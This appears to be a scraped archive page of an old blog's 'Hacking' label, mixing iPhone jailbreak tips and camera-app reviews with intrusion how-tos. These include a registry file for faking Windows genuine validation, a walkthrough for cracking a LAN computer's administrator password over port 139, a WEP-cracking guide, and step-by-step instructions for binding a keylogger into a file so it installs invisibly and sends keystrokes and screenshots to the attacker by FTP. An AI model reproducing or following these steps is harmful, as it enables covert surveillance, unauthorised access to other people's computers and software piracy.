Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

iPodMeister offers people to exchange CDs and DVDs with iPhone, iPod and Hard Drives. The process works, you have to mail the Company telling them the amount of CDs you have and then they will Prepaid FedEx labels which cost will by paid by the company.


Bookmark and Share

This trick will only work on Jail Broken iPhone and iPhone with Firmware OS 3.0  and you need to have Cydia too.


Bookmark and Share


Bookmark and Share

Go run and type Regedit and then press enter



Bookmark and Share





Bookmark and Share

Enable MMS
The non-availability of the MMS feature for 1st generation iPhone (iPhone 2G) was probably one of the most disappointing news for iPhone 2G users that was announced at the WWDC 2009 Keynote address.
In fact, the MMS feature is not available currently to even iPhone 3G and iPhone 3GS in the US. Some folks had figured out a way to enable MMS on iPhone 3G and iPhone 3GS.
Fortunately, it turns out that there is a way to also enable MMS on a jailbroken iPhone 2G.
Some important points before you attempt to enable MMS on your iPhone 2G:

Bookmark and Share

This is another tool that is favored in extracting or recovering passwords. Note very carefully, Cain and Abel is a "PASSWORD RECOVERY" tool, use it carefully.

(THIS POST IS FOR EDUCATIONAL USE ONLY)

Before I start, there are a few requirements.

* Download Cain and Abel from www.oxid.it
* Should have a switched LAN. (Most ISPs other than BSNL provide broadband via LAN, e.g. SIFY, HATHWAY, local Cable internet connections)
* Any Microsoft Windows Operating System.

Bookmark and Share


The following step-by-step tutorial/guide will help you in running fully unlocked and jailbroken iPhone 3GS with iPhone firmware 3.1 on a Windows PC without having to wait for Windows version of PwnageTool or redsn0w. Mac version of the tutorial can be found here.

Bookmark and Share

Best Camera: This app is made by a famous photographer Chase Jarvis. The app do almost everything for the user e.g it enhance the images with one touch filters. You can share the picture directly on Twitter. This app cost $2.99.


Camera Zoom 2: This app allows user to zoom in and out while taking a picture. Also this app is one of the most requested apps. Tap anywhere on the screen and you will capture the picture. The camera zoom 2 cost $0.99.

Color Splash: This app allows user to turn the selected areas of picture from color to black and white. This app cost $1.99.

Photogene: This app allows user to crop, sharpen, correct colors manually or automatically, adjust exposure and contrast, straighten a tilted image, add frame effects, text bubbles and many other things. Photogene cost $2.99.

Pano: This app allows you to make panoramic photos, just using an iPhone and Pano. You can take panoramas with up to 16 photos and then stitch them together with features like a semi-transparent guide to line up the photos. Pano also allows blending and color-correction algorithms. Pano costs $2.99.

Night Camera: This app solves one of the biggest problems with any camera. Shooting in low light is always difficult having a solution on the iPhone just makes me want to use it more. Night Camera uses the iPhone’s accelerometer to trigger the shutter when the camera is stable. It allows three modes: Standard, Stable and Timer. Night Camera costs $0.99.

Photo fx: This app allows you to choose from 32 filters in six categories and 327 presets. Filters include Pro Mist, Center Spot, Close-up Lens, Reflector, Star, Pencil and Polarizer. There are also two add-on groups called Portrait fx and Color fx. Photo fx costs $2.99.

DSLR Camera Remote: This app allows you to plug your camera into your computer and then control your Canon EOS or Nikon DSLR camera from your phone. You can adjust settings, fire the shutter, review images and get a live viewfinder preview, among other things. DSLR Camera Remote requires free server software and a Wi-Fi connection. The iPhone app costs $19.99.

Perfectly Clear: This app applies corrections to your photos automatically, taking flatness out. The app looks at exposure, contrast, color vibrancy, sharpen and tint removal when making its adjustments.

Light: This app allows you to add realistic lighting effects to any image using presets in the app. For example, if you took an image that looks bland, you can add the shadow from a Georgian window to the background. Very slick. Light costs $1.99.

Bookmark and Share



Make your Windows Genuine. There is no need of paying money to different websites etc. Just follow the following instructions:


1. Open "Notepad"
2. Copy and Paste the following code in Notepad

Code:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-7450093-23464"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,
37,34,35,30,30,39,33,2d,32,33,34,36,34,00,2e,00,00,00,41,32,32,2d,30,30,30,
30,31,00,00,00,00,00,00,00,62,fc,61,4c,e0,26,33,16,05,d3,54,e7,a0,de,00,00,
00,00,00,00,49,36,c2,49,20,47,0c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,33,33,35,30,30,00,00,00,00,00,00,00,65,10,
00,00,74,99,dd,b0,f7,07,00,00,98,10,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,c4,ae,d6,1c
"LicenseInfo"=hex:e7,77,18,19,f8,08,fc,7d,e8,f0,df,12,6e,46,cb,3f,ad,b2,dd,b9,
15,18,16,c0,bc,c3,6a,7d,4a,80,8b,31,13,37,5a,78,a2,06,c8,6b,b9,d9,dd,cc,6a,
9c,c5,9b,77,aa,07,8d,56,6a,7c,e4

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd

3. In Notepad click "File" and then "Save".
4. For file type in Save Dialogue box select "All Files" and for the name Type in your name.reg or whatever name you want but the extension shall be ".reg"
5. Click "Save"
6. Double Click the File where you saved it like mine was saved on desktop so i will click on the e.g shuja.reg
7. It will ask you "are you sure"
8. Click "Yes"

Now to see that it work go here:

http://microsoft.com/genuine/downloads/FAQ.aspx

and click on "Validate Windows" on the right.
Click Install if asked about ActiveX

After Validation "Thanks You" Message will appear and you are done.

Bookmark and Share


Providing readers with another post of Twitter Tips and Tricks to increase your followers etc. Just download and read the ebook given below and enjoy.


Bookmark and Share

Hacking computer inside the LAN network.
This technique will be taking advantage of Port 139.
Most of the time,Port 139 will be opened.
First of all,I will do a port scanning at the target computer which is 192.168.40.128.
This computer is inside my LAN network.
Scan it using Nmap.


I get the result and it shows Port 139 is opened up for me.
Now you will need both of these tools:
** USER2SID & SID2USER
** NetBios Auditing Tool
You can get both of them on the Internet.
After you get both of them,put them in the C:\ directory.




You now need to create a null session to the target computer.



Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.
We will first using USER2SID to get the ID.


We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We take the ID we get from the guest account and modified it become
"5 21 861567501 1383384898 839522115 500".

Please leave out the S-1-,leave out all the - too.



Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is Administrator.

Create a text file called user.txt and the content will be the username of the Admin account.


Prepare yourself a good wordlist.




Now put both of them in the same directory with the NetBios Auditing Tool.


Now we are going to crack the Admin account for the password in order to access to the target computer.

Browse to the NetBios Auditing Tool directory.



Press on enter and the tool will run through the passlist.


In this case,I have get the password.

In order to proof that I can get access to the target computer using this password.




After you press enter,it will prompt you for the username and password.


Therefore,just input them inside the prompt and continue.



Target C drive will be on your screen.


In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.


The download link of the tools will be:

Download

Reblog this post [with Zemanta]

Bookmark and Share

Everyone has lots of internet connections around their house, and frequently these connections are wireless. Most of the time, it is possible simply to either have a laptop with WiFi or a PC with WiFi and connect to open networks with the Windows built-in WiFi client. Cheap, free, and easy wireless internet.

Sometimes people are smart and they like to secure their internet, and when this happens we have to use some toolz.

When people secure their internet using WEP (which stands for something long, it doesn't matter), they set a key with which all the people who want to connect need to input into their client software (which is most often Windows). If you have the key, you can connect, if not you cannot.

WEP is, however, very insecure. Using AirSnort anyone can obtain the WEP key of a network, and thus obtain access to it. Keep in mind you must have a supported card to do this, check the site for more information.

Of course, this is really mean to do to someone. This is probably most useful for people who have forgotten their WEP key, because it is not like the average joe computer user is going to know how to hack a WEP network.

But we do.

To start, you must have AirSnort installed correctly. Since it is a native Linux program, they developers never really targeted it towards newbies, so to install it you have to jump through some hoops. A really good guide on getting the program running in the first place is here: http://airsnort.shmoo.com/win_setup.html

After you have it all installed and running, simply leave it running in the background. It will capture and analyze network traffic, and eventually you will have a WEP key. If the particular network has lots of traffic, you will likely have a key in a short amount of time but if it is a light traffic network you will need to stimulate traffic or leave your computer on for a much longer amount of time.

Stimulating traffic is weird and probably not worth the time required to make it work. It is recomended to try another network if this does not work.

Hopefully you can get a connection, and eventually test out the potential of WiFi.

Bookmark and Share

Ardamax Keylogger 2.9
http://w15.easy-share.com/1700470036.html


Key Gen----------

http://rapidshare.com/files/123353829/keyGen.zip.html

Download Both files first.
after installation of keylogger successfully,
enter da registration key den
right click on the Ardamax icon in the tray bar (in the right bottom corner of your screen), then click on "Remote Installation...".
-A new screen will open and you'll have to click on "Next".
-Tick the "Append keylogger engine to file or another application" and click on "Browse...". Now, you'll have to browse for the file or the application you want to infect. It can be anything, and, don't worry, the file won't be infected (Ardamax will make a copy of it and leave the one you chose intact). So, when someone will double click on this file, Ardamax will be install on his PC (He won't see any Ardamax installation or w/e window and probably never know he's infected). Once you choosed the file, click on "Open".
-In the same window ("Appearance"), leave "Installation folder on target computer" the same, and under "Additional components", untick "Log Viewer" (untick all) and click on "Next".
-In "Invisibility" window, leave all options tick, click on "Next".
-Now, click on "Enable..." and in the window that popuped, enter a password. Leave all the options tick, and click on "Next".
-Untick "Check for updates" and click on "Next".
-Leave the 2 options tick, and I suggest to change the "Hidden mode on:" to something easier to remember (such as ctrl+z). Also, I would put a "Self destruct on:" date (you have to tick the box beside the date, scroll down and choose a date) this will uninstall Ardamax on the remote PC on the date you choosed)) such as a week later (or until you're sure you know what you want to). Click on "Next".
-Now, in the new window ("Control"), tick "Send logs every" and, right beside, choose the frequency of the logs you'll receive (usually 1/hour or 1/day is fine).
-In the same window ("Control"), under "Delivery method", select (tick) "FTP" and untick "Email". This will send all the logs to your website instead of an email address, it make easier and faster to see the logs in my opinion.

After that, click on "Test", if everythin went fine, a window witn the message "The Ardamax Keylogger test FTP delivery has been completed succesfully". Click on "OK", and then "Next".
-Select the options you want (I suggest to leave all them tick), and press "Next".
-If you choosed to take screenshot, now select the frequency of them (I think 1/15min is fine), select "Full Screen" and put the quality to the maximum, press on "Next".
-Leave these fields intact, but, I stongly suggest to change the icon to whatever you want (click on "Change Icon..." and look for one you want, you can also click on "Browse..." and browse for what you want) when you chosed it, press on "OK". Press on "Next".
-Now, press on "Finish". If everything went fine, a window with the message "Deployment package created succesfully." appear, press "OK".

Bookmark and Share